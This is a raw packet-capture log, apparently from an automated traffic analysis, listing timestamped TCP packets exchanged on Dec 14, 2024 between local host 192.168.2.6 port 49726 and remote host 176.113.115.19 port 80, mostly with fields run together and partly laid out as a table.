                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.866708040 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.874794006 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.874900103 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.874923944 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.875248909 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.883375883 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.883394003 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.883454084 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.883454084 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.891619921 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.891695023 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.891700029 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.891765118 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.899988890 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.900038958 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.900067091 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.900151014 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.908457041 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.908518076 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.908534050 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.908744097 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.916827917 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.916898012 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.916922092 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.916955948 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.924452066 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.924561024 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.924587965 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.924638033 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.932105064 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.932164907 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.042948961 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.043030024 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.043059111 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.043164015 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.045382023 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.045504093 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.046248913 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.046312094 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.046468973 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.051137924 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.051213026 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.051245928 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.051348925 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.056138992 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.056154966 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.056204081 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.056257010 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.060811996 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.060858965 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.060909986 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.065596104 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.289952993 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.293325901 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.293406010 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.293435097 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.293690920 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.296958923 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.297044992 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.297050953 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.297288895 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.300693989 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.300707102 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.300748110 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.300748110 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.304136992 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.304259062 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.304284096 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.304541111 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.307831049 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.307917118 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.307967901 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.307967901 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.311347961 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.311465025 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.311600924 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.314949989 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.315026045 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.315031052 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.315335035 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.318568945 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.318628073 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.318681955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.318772078 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.322187901 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.322292089 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.322293043 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.322371960 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.325977087 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.326065063 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.326090097 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.326154947 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.329410076 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.329494953 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.329534054 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.329534054 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.333054066 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.333168030 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.333194017 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.333261013 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.336592913 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.336690903 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.336726904 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.336827993 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.340269089 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.340347052 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.340423107 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.340573072 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.343898058 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.343959093 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.427233934 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.427289963 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.427314997 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.427356005 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.428828955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.428917885 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.429024935 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.429177999 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.431797028 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.431910992 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.432948112 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.433001041 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.433041096 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.433665991 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.436038017 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.436100006 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.436351061 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.436352015 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.439074039 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.439208984 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.439280987 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.442039013 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.442171097 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.442248106 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.444921017 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.445029974 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.445391893 CET4972680192.168.2.6176.113.115.19
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Dec 14, 2024 14:16:21.447695017 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.447798014 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.447874069 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.450536966 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.450660944 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.450721025 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.453238964 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.453376055 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.453655005 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.455918074 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.456018925 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.456286907 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.458592892 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.458692074 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.458725929 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.459958076 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.461137056 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.461234093 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.461240053 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.463707924 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.463788033 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.463820934 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.463943958 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.466250896 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.466418028 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.466491938 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.468758106 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.468821049 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.468844891 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.468976021 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.471296072 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.471415997 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.471479893 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.473745108 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.473803997 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.473906040 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.476675034 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.476785898 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.476808071 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.476903915 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.478945971 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.479031086 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.479091883 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.481300116 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.481359005 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.481645107 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.483859062 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.484054089 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.484175920 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.486310959 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.486376047 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.486434937 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.488303900 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.489712000 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.489759922 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.489830971 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.491281033 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.491420984 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.491483927 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.493783951 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.493966103 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.494045973 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.496264935 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.496328115 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.496428967 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.499200106 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.499344110 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.499371052 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.499412060 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.501344919 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.501466036 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.501548052 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.503740072 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.503827095 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.504353046 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.506206036 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.506337881 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.506551027 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.508729935 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.508826017 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.508905888 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.511235952 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.511346102 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.511421919 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.513700008 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.513802052 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.513884068 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.516294003 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.516386986 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.516423941 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.517874956 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.518712997 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.518726110 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.518809080 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.518809080 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.521207094 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.521219969 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.521274090 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.523685932 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.523799896 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.523909092 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.526228905 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.526319981 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.526392937 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.528736115 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.528899908 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.528901100 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.530020952 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.531245947 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.531343937 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.531786919 CET   49726        80         192.168.2.6      176.113.115.19
Dec 14, 2024 14:16:21.533700943 CET   80           49726      176.113.115.19   192.168.2.6
Dec 14, 2024 14:16:21.533754110 CET   49726        80         192.168.2.6      176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.533849001 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.534439087 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.536216974 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.536261082 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.536287069 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.538238049 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.538922071 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.538966894 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.539177895 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.541198015 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.541294098 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.541320086 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.541512012 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.543704033 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.543829918 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.543891907 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.546180964 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.546226978 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.546288967 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.546387911 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.548676968 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.548732996 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.548755884 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.548933983 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.551287889 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.551383018 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.551584005 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.553761005 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.553798914 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.553921938 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.556210041 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.556325912 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.556354046 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.557177067 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.558706045 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.558768034 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.558815002 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.559092045 CET4972680192.168.2.6176.113.115.19
